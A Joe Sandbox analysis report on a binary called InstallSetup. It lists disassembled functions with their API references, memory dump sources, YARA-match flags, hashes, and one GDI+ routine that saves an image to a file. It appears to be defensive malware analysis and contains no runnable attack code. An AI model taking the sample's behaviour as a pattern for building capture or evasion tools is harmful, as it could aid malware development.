GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EBA5E231), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EBA5E231), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 00944FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00944FCA
int.LIBCPMT ref: 00944FE1

Part of subcall function 0094BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0094BFD4
Part of subcall function 0094BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0094BFEE

std::locale::_Getfacet.LIBCPMT ref: 00944FEA
std::_Facet_Register.LIBCPMT ref: 0094501B
std::_Lockit::~_Lockit.LIBCPMT ref: 00945031
__CxxThrowException@8.LIBVCRUNTIME ref: 0094504F

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: e4404fe4ea40dea1b81c19f97686ba18e8a0acbedd81e6ecb92cfbf6841ae30b
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: B011CE35D006189BCB25EBA4C812FAE77B4BF84310F65455AF429AB2D2DB749E09CBD0

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 0094C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0094C401
int.LIBCPMT ref: 0094C418

Part of subcall function 0094BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0094BFD4
Part of subcall function 0094BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0094BFEE

std::locale::_Getfacet.LIBCPMT ref: 0094C421
std::_Facet_Register.LIBCPMT ref: 0094C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0094C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0094C486

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 172c18073b3c2f7e4bb6e84867c6f656876aeb54f0e0c7e59fe8f212fb12add7
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 5511CEB19012189FCB15FBA4C815FED7774BF84710F644559F411AB2A2DF348E05CBA0

Function 00944E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00944E8C
int.LIBCPMT ref: 00944EA3

Part of subcall function 0094BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0094BFD4
Part of subcall function 0094BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0094BFEE

std::locale::_Getfacet.LIBCPMT ref: 00944EAC
std::_Facet_Register.LIBCPMT ref: 00944EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 00944EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 00944F11

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 636cb5ea901e742f8efc9d59b65fcbae5cca971b181ab0e2f766a20f30084b87
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: C311A9328002299BCB25EBA4D802FAE77B5BF84310F240559F914AB2A2DB749E05CB90

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 009808F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 009808F8
make_shared.LIBCPMT ref: 00980943

Strings

v)D, xrefs: 009808F3
RCC, xrefs: 0098092A
MOC, xrefs: 0098091B

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: b15ac1e9cd4c6699c952d7928cc69e2775ba5ecab006e30b010b4ec4e32c6773
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 07F0E771A00614DFDB52FF64C40276C3B74AFC5B40B4580A1F884AB362DB799E88CFA1

Function 0096B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: c1e7e0624cb82881d7995dbedbaf8c6d942813dbab0cfd4e17fedabd9e97c217
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: 7871C1319002569BCB219F58C894AFFBB79EF55350F24062AF416D7291EB708DC1CBA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 00970CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0097390E: RtlAllocateHeap.NTDLL(00000000,0094DAD7,00000000), ref: 00973940

_free.LIBCMT ref: 00970DB6
_free.LIBCMT ref: 00970DCD
_free.LIBCMT ref: 00970DEC
_free.LIBCMT ref: 00970E07
_free.LIBCMT ref: 00970E1E

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 544097a18744d1d811c06ddd833dd1805e3103f6cc9311df6157ff6904f1cfed
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 1C519172A00704EFDB209F69D841B6AB7F9FF95720B148569E80DDB290E775EA01DB80

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 00971742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009717B4
_free.LIBCMT ref: 009717D4

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: e7843576f7416e0346bbfaa7c29557f288b5f8d7c2292e217f0e93cfaffbc032
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: D9419D77A002049BCB24DF7CC981A9EB7E5EF89714F1585A9E919EB381D731ED01CB81

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0095B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0095B152

Part of subcall function 00951188: _SpinWait.LIBCONCRT ref: 009511A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0095B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0095B198
List.LIBCMT ref: 0095B21B
List.LIBCMT ref: 0095B22A

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: 506577e3306a9d46d51a53ab08da217ee01cd9012f085399257d8bd17e6b3b00
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 23316B31D05A16DFCB14EFA6C5A16EDB7B0BF95306F14006ADC1167682CB716D4CCBA0

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 009450C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 009450A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 009450B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0094511C
